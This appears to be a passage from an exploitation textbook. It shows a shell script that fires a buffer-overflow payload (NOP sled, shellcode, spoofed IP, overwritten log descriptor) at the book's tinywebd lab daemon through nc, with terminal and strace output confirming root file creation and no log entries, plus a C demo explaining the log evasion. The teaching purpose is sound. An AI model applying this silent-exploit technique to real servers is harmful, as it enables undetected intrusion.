(perl -e "print \"$FAKEREQUEST\"";
./addr_struct "$SPOOFIP" "$SPOOFPORT";
perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\x01\x00\x00\x00\r\n\"") | nc -w 1 -v $2 80
When this script is used, the exploit is totally silent and nothing is written
to the log file.
reader@hacking:~/booksrc $ sudo rm /Hacked
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon..
reader@hacking:~/booksrc $ ls -l /var/log/tinywebd.log
-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd.log
reader@hacking:~/booksrc $ ./xtool_tinywebd_silent.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /var/log/tinywebd.log
-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd.log
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-19 23:35 /Hacked
reader@hacking:~/booksrc $
Notice the log file's size and modification time remain the same. Using this
technique, we can exploit tinywebd without leaving any trace in the log
files. The write calls still execute cleanly: the log descriptor argument was
overwritten with 1 (the \x01\x00\x00\x00 at the end of the payload), and the
daemon's standard output points at /dev/null, so the log entries are written
and silently discarded. This is shown by strace in the output below, captured
while the silent exploit tool is run in another terminal: both log writes go
to file descriptor 1 and return their full byte counts.
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 478 0.0 0.0 1636 420 ? Ss 23:24 0:00 ./tinywebd
reader 1005 0.0 0.0 2880 748 pts/1 R+ 23:36 0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(1, "09/19/2007 23:36:31> ", 21) = 21
write(1, "From 12.34.56.78:9090 \"GET / HTT"..., 47) = 47
Process 478 detached
reader@hacking:~/booksrc $
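To make the mechanism behind those two strace lines concrete, here is a small C model. It is an added example written for this page, not code from the book or from tinywebd. It assumes, as the payload's trailing \x01\x00\x00\x00 requires, that the log descriptor reaches the logging code as a function argument, so the same overflow that takes control can replace it. The logging function is called once with the real log descriptor and once with that argument replaced by 1 while standard output has been pointed at /dev/null, the state a daemonized process is in. The names log_request(), point_stdout_at_devnull(), run_demo() and the /tmp path are this example's own assumptions, and the client address and request string are constructed sample input.

```c
/* silent_log_demo.c: why tinywebd's log stayed untouched.
 * Added example for this page, not tinywebd's own code. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Model of the logging done inside the connection handler: the
 * descriptor arrives as an ARGUMENT, so it sits on the stack above
 * the return address, within reach of the overflow. (Assumption
 * of this example; the format follows the strace output above.) */
static ssize_t log_request(int logfd, const char *client, const char *request)
{
    char line[128];
    int n = snprintf(line, sizeof line, "From %s \"%s\"\n", client, request);
    if (n < 0 || (size_t)n >= sizeof line)
        return -1;
    return write(logfd, line, (size_t)n);
}

/* What a daemonized process looks like: stdout is /dev/null.
 * Returns a dup of the old stdout so the caller can restore it. */
static int point_stdout_at_devnull(void)
{
    int saved = dup(STDOUT_FILENO);
    int devnull = open("/dev/null", O_WRONLY);
    if (saved < 0 || devnull < 0)
        return -1;
    dup2(devnull, STDOUT_FILENO);
    close(devnull);
    return saved;
}

static off_t file_size(int fd)
{
    struct stat st;
    return fstat(fd, &st) == 0 ? st.st_size : -1;
}

struct demo {
    ssize_t honest_written;   /* bytes write() reported, logfd intact      */
    off_t   honest_growth;    /* bytes the log file actually grew          */
    ssize_t hijacked_written; /* bytes write() reported, logfd replaced by 1 */
    off_t   hijacked_growth;  /* bytes the log file grew this time         */
};

/* Runs both cases against a temporary log file. Returns 1 on success,
 * 0 if the temp file or /dev/null could not be set up. */
int run_demo(struct demo *d)
{
    char path[] = "/tmp/tinywebd_demo_XXXXXX";   /* assumed scratch location */
    int logfd = mkstemp(path);
    if (logfd < 0)
        return 0;
    unlink(path);                 /* the file lives only as long as logfd */

    const char *client = "12.34.56.78:9090";      /* constructed sample */
    const char *req = "GET / HTTP/1.1";

    /* Case 1: the handler is called with the real log descriptor. */
    off_t before = file_size(logfd);
    d->honest_written = log_request(logfd, client, req);
    d->honest_growth = file_size(logfd) - before;

    /* Case 2: the overflow's trailing \x01\x00\x00\x00 has turned the
     * logfd argument into 1; the handler itself is unchanged. */
    int saved_stdout = point_stdout_at_devnull();
    if (saved_stdout < 0) {
        close(logfd);
        return 0;
    }
    int overwritten_logfd = 1;
    before = file_size(logfd);
    d->hijacked_written = log_request(overwritten_logfd, client, req);
    d->hijacked_growth = file_size(logfd) - before;

    dup2(saved_stdout, STDOUT_FILENO);
    close(saved_stdout);
    close(logfd);
    return 1;
}

int main(void)
{
    struct demo d;
    if (!run_demo(&d))
        return 1;
    printf("intact logfd : write() = %zd, log grew %lld bytes\n",
           d.honest_written, (long long)d.honest_growth);
    printf("logfd -> 1   : write() = %zd, log grew %lld bytes\n",
           d.hijacked_written, (long long)d.hijacked_growth);
    return 0;
}
```

Both calls report the full 39 bytes written, and only the first grows the file. Reading the log afterwards shows nothing, which is the point of the technique; what does catch it is a check that compares the daemon's observed activity (a completed request, the /Hacked marker) against the log's size and mtime, or an audit of where write() calls actually go, as strace -e trace=write did above.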
0x670 The Whole Infrastructure
As always, details can be hidden in the bigger picture. A single host usually
exists within some sort of infrastructure. Countermeasures such as intrusion
detection systems (IDS) and intrusion prevention systems (IPS) can detect
abnormal network traffic. Even simple log files on routers and firewalls can
reveal abnormal connections that are indicative of an intrusion. In particular, the connection to port 31337 used in our connect-back shellcode is a